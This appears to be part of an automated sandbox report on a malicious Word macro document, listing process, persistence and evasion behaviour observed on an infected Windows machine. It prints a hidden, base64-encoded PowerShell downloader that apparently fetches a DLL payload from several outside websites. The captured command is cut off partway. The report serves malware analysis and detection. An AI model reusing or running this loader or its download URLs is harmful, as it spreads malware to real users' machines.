ACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Suspicious powershell command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Iiasa\gdao.xuk:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pqftsc\netes.ucb:Zone.Identifier read attributes | delete
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021109C FindFirstFileW,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
